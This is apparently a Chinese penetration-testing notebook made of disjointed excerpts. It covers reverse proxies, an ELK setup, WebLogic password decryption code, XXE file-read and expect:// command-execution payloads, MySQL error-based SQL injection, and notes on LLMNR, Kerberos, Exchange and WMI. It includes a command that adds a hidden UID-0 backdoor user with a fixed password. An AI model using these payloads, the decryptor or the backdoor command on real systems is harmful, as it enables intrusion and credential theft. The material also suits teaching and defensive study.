前言

近期对A Fresh Look On Reverse Proxy Related Attacks 一文进行了深入学习，根据自己的实践结果撰写笔记。

反向代理如何工作？

反向代理是从互联网接收请求并转发到内网服务器，对用户而言无感知存在。一个反向代理功能包含接收请求，处理，并转发到后端。

a) 处理请求

代理机请求处理包含以下几个主要步骤：

1. 语法
2. URL 解码
3. 路径标准化

指南

https://elkguide.elasticsearch.cn/logstash/get-start/install.html

架构

Elasticsearch 实时全文搜索和分析引擎
Logstash 日志收集，分析，过滤
Kibana 数据图形化展示

Server（producer） Beats -> Zookeeper Kafka topic -> (按照业务功能拆分ELK cluster) Logstash (consumer) -> ES -> Kibana (日志敏感信息泄露)

服务器
/etc/hosts

1
2
3
4
5
6

30.3.229.120    develk01
30.3.229.121    develk02
30.3.229.122    develk03
30.3.229.123    devkafka01
30.3.229.124    devkafka02
30.3.229.125    devkafka03

添加root用户
useradd -u 0 -o -g root -G root -d /root/ user1
echo “user1”:”passw0rD” | chpasswd

常用软件密码解密

Weblogic

1. 登陆密码
2. 数据库配置文件（Oracle\Middleware\user_projects\domains\base_domain\config\jdbc\tstJDBCDataScouce-5006-jdbc.xml）

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

import weblogic.security.internal.*;
import weblogic.security.internal.encryption.*;
/**
*
* 密码文件 Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties
* 密钥文件 Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystemIni.dat
*/
public class WebLogicDecryptor {
	private static ClearOrEncryptedService ces;
	public static void main(String[] args) throws Exception {
		if (args.length < 1) {
			throw new Exception("must set [domainDir] [encryptStr]");
		}
		ces = new ClearOrEncryptedService(
				SerializedSystemIni.getEncryptionService(args[0])); // your_domain
		System.out.println("Decrypted: " + ces.decrypt(args[1])); // {AES}9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8=  12id9*@YNs0_q2dxwe
	}
}

XML Injection

XML External Entity (XXE) Processing

访问本地资源

1
2
3
4
5
6
7
8
9
10

<?php
$xml=<<<XML
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [  
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
XML;
$data = simplexml_load_string($xml);
print_r($data);
?>

远程代码执行，需要php开启expect

1
2
3
4
5
6
7
8

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ 
 <!ELEMENT foo ANY >
 <!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
 <user>&xxe;</user>
 <pass>mypass</pass>
</creds>

名称欺骗中间人攻击

LLMNR

Link-Local Multicast Name Resolution (LLMNR)
链路本地多播名称解析

当我们执行ping WEBTST01将会发送LLMNR请求解析WEBTST01。所有的LLMNR包将会发送到组播地址224.0.0.252 MAC:01:00:5E:00:00:FC，响应主机将单播回应查询。

LLMNR packet header structure

• ID - A 16-bit identifier assigned by the program that generates any kind of query.
• QR - Query/Response.
• OPCODE - A 4-bit field that specifies the kind of query in this message. This value is set by the originator of a query and copied * into the response. This specification defines the behavior of standard queries and responses (opcode value of zero). Future specifications may define the use of other opcodes with LLMNR.
• C - Conflict.
• TC - TrunCation.
• T - Tentative.
• Z - Reserved for future use.
• RCODE - Response code.
• QDCOUNT - An unsigned 16-bit integer specifying the number of entries in the question section.
• ANCOUNT - An unsigned 16-bit integer specifying the number of resource records in the answer section.
• NSCOUNT - An unsigned 16-bit integer specifying the number of name server resource records in the authority records section.
• ARCOUNT - An unsigned 16-bit integer specifying the number of resource records in the additional records section.

MYSQL

MYSQL各个版本下载
http://mirrors.sohu.com/mysql/

报错注入

常用报错函数

FLOOR(X)表示向下取整

select FLOOR(12.2) -> 12

1
2
3
4
5
6
7

select * from t where name='a' 
UNION ALL select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x
[Err] 1062 - Duplicate entry 'root@localhost1' for key 'group_key'
select * from t where name='a' 
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

XML文档支持

ExtractValue() 长度32位限制

1
2

select * from t where name='a' 
and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

[Err] 1105 - XPATH syntax error: ‘~root@localhost~’

UpdateXML()

1
2

select * from t where name='a' 
and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

[Err] 1105 - XPATH syntax error: ‘~root@localhost~‘

首先了解一下Kerberos认证协议

Kerberos Overview & Communication Process:

KDC（Key Distribution Center）有两个服务组成：身份验证服务（Authentication Server，简称AS）和票据授予服务（Ticket Granting Server，简称TGS）。

User logs on with username & password.

客户端认证

1. 客户端将用户id明文消息发送到AS。
2. AS返回使用客户端用户密码加密的会话密钥session key和使用krbegt密码加密的TGT。
3. 客户端使用用户密码解密消息获得会话密钥，该会话密钥用于与TGS的进一步通信。

客户服务授权

1. 客户端发送TGT和用Client/TGS会话密钥加密的认证器。
2. TGS解密TGT获得会话密钥并用此密钥解密认证器，如果id匹配则返回使用服务密码加密的客户端到服务器的票据和使用Client/TGS会话密钥加密的客户端/服务器会话密钥session key2。

客户服务请求

1. 客户端发送一个用session key2加密的新的Authenticator和服务票据。
2. 服务器用自己密码解密服务票据并提供服务。

Service Principal Names

服务主体名称 (SPN) 是服务实例的唯一标识符。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。以为MSSQL服务配置SPN为例。
https://technet.microsoft.com/zh-cn/library/bb735885.aspx

Microsoft Exchange Server 做为消息与协作系统。它提供了业界最强的扩展性、高可靠性、安全性和高处理性能，被许多企业、学校、政府等作为主要邮件系统。在内网渗透测试中，对邮件系统的把控会让你事半功倍，尤其是和AD绑在一起的Exchange。

通过本文你将了解Ps下对Exchange邮件的基本操作，这也同样适用于运维管理，当然相比博大精深的ES是远远不够的。以下环境为Exchange server 2013，也同样适用于2010等版本。

你可以在开始菜单中通过 Exchange Management Shell （EMS）管理器快捷方式连接到 exchange server，初始化过后你将得到一个Powershell命令窗口。如果连接失败，请相信我，一定是你内存分配的不够，默认安装的Exchange也至少需要分配6个G内存。

如果一切都没有问题，并且你已经获取了域控权限，那就开始我们的旅程吧！

WMI 管理规范

术语

• CIM - Common Information Model – this is the premier concept of WBEM by this model WMI stores the Managed objects data (namespace, classes, methods, properties etc.).
• CIM Repository – This is the storage that holds the Managed objects data. The structure of the CIM repository is build upon the DMTF.
• CIMOM - Common Information Model object manager. The CIM repository is managed by the CIMOM, which acts as an agent for object requests. The CIMOM tracks available classes and determines which provider is responsible for supplying instances of these classes..
• DMTF - Distributed Management Task Force – The DMTF consortium was founded in May of 1992. This initiative was conceived and created by eight companies like: BMC Software Inc., Cisco Systems Inc., Compaq Computer Corp., Intel Corp., and Microsoft Corp. etc. The aims of this consortium are to define industry standards for management.
• MIB – Management Information Base describes a set of managed objects. Each managed object in a MIB has a unique identifier.
• MOF - Managed Object Format. This text file includes the class definition of on or more managed object. You can export and import this definition from the CIM repository by using the WMI CIM Studio.
• Schema - a group of classes that describe a particular management environment.
• SNMP - Simple Network Management Protocol. SNMP is an Internet standard defined by the IETF and is a part of TCP/IP suite of protocols. SNMP is the protocol by which managed information is travel between stations and agents. Management information refers to a collection of managed objects that reside in a virtual information store called a Management Information Base (MIB).
• WBEM - Web-Based Enterprise Management – WBEM stands for several DMTF industry standards including the Common Information Model. WBEM provides a standardized way to access information from various hardware and software management systems in an enterprise environment.

协议

DCOM TCP Port 135
WinRM TCP Ports 5985 (HTTP) and 5986 (HTTPS).
服务 Winmgmt